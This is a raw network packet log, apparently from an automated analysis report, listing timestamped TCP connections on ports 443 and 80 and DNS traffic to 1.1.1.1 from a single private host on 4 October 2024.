                                                                                                                              Oct 4, 2024 15:11:16.281546116 CEST49838443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.299406052 CEST4434983913.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.315399885 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.324724913 CEST4434983813.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.324994087 CEST4434983813.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.325649977 CEST49838443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.325649977 CEST49838443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.359610081 CEST4434983913.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.359641075 CEST4434983913.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.359698057 CEST4434983913.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.359709024 CEST49839443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.359743118 CEST49839443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.360922098 CEST49839443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.360938072 CEST4434983913.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.526246071 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.526631117 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.526644945 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.527045012 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.527350903 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.527417898 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.527513981 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.569839954 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.570096970 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.570111036 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.570468903 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.570755959 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.570820093 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.570859909 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.571408987 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.600764036 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.600794077 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.600826025 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.600927114 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.600941896 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.600950003 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.601008892 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.601711035 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.601764917 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.601783037 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.601788998 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.601815939 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.602251053 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.604995012 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.604995012 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.604995012 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.611413956 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.616625071 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.630712032 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.630744934 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.630760908 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.630820990 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.630846977 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.631176949 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.632508039 CEST49838443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.632538080 CEST4434983813.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.674134016 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.674211025 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.674273014 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.675023079 CEST49841443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.675044060 CEST4434984113.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.678864002 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.678900003 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.679091930 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.679261923 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.679272890 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.715141058 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.715164900 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.715229988 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.715240955 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.715289116 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.715289116 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.716053009 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.716130972 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.716135025 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.716202021 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.716341019 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.716363907 CEST4434984013.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.716403008 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.716403008 CEST49840443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.720136881 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.720170975 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.720243931 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.720462084 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:16.720470905 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:16.906650066 CEST49837443192.168.2.174.175.87.197
                                                                                                                              Oct 4, 2024 15:11:16.906670094 CEST443498374.175.87.197192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.324052095 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.325903893 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.325923920 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.326340914 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.328290939 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.328397989 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.328423977 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.373188972 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.374347925 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.374371052 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.374732971 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.375155926 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.375226974 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.375406981 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.375422955 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.382574081 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.419414043 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.425216913 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.425313950 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.425395966 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.426301956 CEST49843443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.426332951 CEST4434984313.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.480496883 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.480525970 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.480541945 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.480595112 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.480616093 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.480664968 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.563806057 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.563842058 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.563899040 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.563981056 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:17.563991070 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.563991070 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.564068079 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.564738035 CEST49844443192.168.2.1713.107.246.45
                                                                                                                              Oct 4, 2024 15:11:17.564759970 CEST4434984413.107.246.45192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.159993887 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.165414095 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.272855043 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.272937059 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.274257898 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.274291992 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.274416924 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.274702072 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.274818897 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.283109903 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.283294916 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.283406973 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.283580065 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.283591032 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.283600092 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.372704029 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.372813940 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:20.511903048 CEST44349690204.79.197.200192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:20.512033939 CEST49690443192.168.2.17204.79.197.200
                                                                                                                              Oct 4, 2024 15:11:21.110779047 CEST4969880192.168.2.172.19.126.163
                                                                                                                              Oct 4, 2024 15:11:21.115849018 CEST80496982.19.126.163192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:21.115916014 CEST4969880192.168.2.172.19.126.163
                                                                                                                              Oct 4, 2024 15:11:27.044368982 CEST44349814172.67.71.124192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:27.044462919 CEST44349814172.67.71.124192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:27.044557095 CEST49814443192.168.2.17172.67.71.124
                                                                                                                              Oct 4, 2024 15:11:27.051707029 CEST44349812104.26.12.69192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:27.051789045 CEST44349812104.26.12.69192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:27.051845074 CEST49812443192.168.2.17104.26.12.69
                                                                                                                              Oct 4, 2024 15:11:27.775285006 CEST49814443192.168.2.17172.67.71.124
                                                                                                                              Oct 4, 2024 15:11:27.775311947 CEST44349814172.67.71.124192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:27.775885105 CEST49812443192.168.2.17104.26.12.69
                                                                                                                              Oct 4, 2024 15:11:27.775918961 CEST44349812104.26.12.69192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:32.232702971 CEST49716443192.168.2.1751.255.64.170
                                                                                                                              Oct 4, 2024 15:11:32.232717991 CEST4434971651.255.64.170192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:34.891362906 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:34.891417980 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:34.891578913 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:34.891695023 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:34.891710043 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.411637068 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:35.411684990 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.411757946 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:35.445770979 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:35.445791006 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.664077044 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.664695978 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:35.664719105 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.665719986 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:35.665740967 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:35.665761948 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:35.665770054 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013637066 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013665915 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013714075 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013747931 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:36.013777971 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013830900 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:36.013843060 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.013906002 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:36.014153957 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:36.014177084 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.014199972 CEST49845443192.168.2.1720.190.159.2
                                                                                                                              Oct 4, 2024 15:11:36.014206886 CEST4434984520.190.159.2192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.063263893 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.063402891 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:36.067344904 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:36.067353010 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.067619085 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.084990978 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.085031986 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.085269928 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.087435961 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.087451935 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.109312057 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:36.151411057 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.240737915 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.240819931 CEST4434984613.107.5.88192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.240940094 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:36.244539022 CEST49846443192.168.2.1713.107.5.88
                                                                                                                              Oct 4, 2024 15:11:36.794863939 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.794965029 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.846365929 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.846383095 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.846756935 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:36.846812010 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.848669052 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:36.848710060 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:37.256527901 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:37.256603003 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:37.256642103 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:37.256654978 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:37.256668091 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:37.256700039 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:37.256712914 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:37.256757021 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:37.259840965 CEST49847443192.168.2.172.23.209.133
                                                                                                                              Oct 4, 2024 15:11:37.259860992 CEST443498472.23.209.133192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:46.394124985 CEST4434971651.255.64.170192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:46.394202948 CEST4434971651.255.64.170192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:46.394279957 CEST49716443192.168.2.1751.255.64.170
                                                                                                                              Oct 4, 2024 15:11:47.781424046 CEST49716443192.168.2.1751.255.64.170
                                                                                                                              Oct 4, 2024 15:11:47.781450987 CEST4434971651.255.64.170192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.318341017 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:11:50.318403959 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.318515062 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:11:50.318895102 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:11:50.318918943 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.966742039 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.967055082 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:11:50.967067957 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.967402935 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:50.967705011 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:11:50.967755079 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:51.017828941 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:12:00.881850004 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:12:00.881937981 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              Oct 4, 2024 15:12:00.881997108 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:12:01.776854038 CEST49849443192.168.2.17142.250.185.68
                                                                                                                              Oct 4, 2024 15:12:01.776884079 CEST44349849142.250.185.68192.168.2.17
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 4, 2024 15:10:45.645649910 CEST6187453192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:45.645823002 CEST4915953192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:45.660609007 CEST53637901.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:45.678673983 CEST53498761.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:45.694248915 CEST53491591.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:45.835630894 CEST53618741.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:47.037681103 CEST53559421.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:47.216768980 CEST5895953192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:47.216929913 CEST4961153192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:47.251015902 CEST53496111.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST53589591.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:48.219113111 CEST5742753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:48.219264984 CEST6401753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:48.231281996 CEST53574271.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:48.231997967 CEST53640171.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:50.149939060 CEST5437853192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:50.150091887 CEST5944353192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:50.156817913 CEST53543781.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:50.157031059 CEST53594431.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:50.251413107 CEST5785253192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:50.251609087 CEST5753453192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:50.259618998 CEST53575341.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:50.259639025 CEST53578521.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:58.141937971 CEST5735153192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:58.142151117 CEST5826353192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:58.156833887 CEST53573511.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:58.159579039 CEST53582631.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:59.134464025 CEST6067253192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:59.134639978 CEST6014253192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:10:59.142731905 CEST53588131.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:59.146250963 CEST53606721.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:10:59.147727966 CEST53601421.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:00.912980080 CEST53597381.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.127319098 CEST5488953192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.127319098 CEST5082653192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.150150061 CEST53548891.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.150163889 CEST53508261.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.244987011 CEST6350553192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.245239019 CEST5044653192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.248673916 CEST5000153192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.248919964 CEST4938953192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:02.252788067 CEST53635051.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.253099918 CEST53504461.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.256145000 CEST53493891.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:02.256215096 CEST53500011.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:03.583522081 CEST5172353192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:03.583669901 CEST5503053192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:03.590678930 CEST53517231.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:03.590909958 CEST53550301.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:03.993532896 CEST53624161.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:09.090667963 CEST5113853192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:09.090892076 CEST5856753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:09.107079029 CEST53511381.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:09.123783112 CEST53585671.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:12.435842991 CEST5786753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:12.439958096 CEST5861353192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:12.442467928 CEST53578671.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:12.447712898 CEST53586131.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:12.500124931 CEST6258753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:12.500252962 CEST5065753192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:11:12.510883093 CEST53625871.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:12.526141882 CEST53506571.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:15.999988079 CEST53621471.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:22.939441919 CEST53500351.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:32.927177906 CEST138138192.168.2.17192.168.2.255
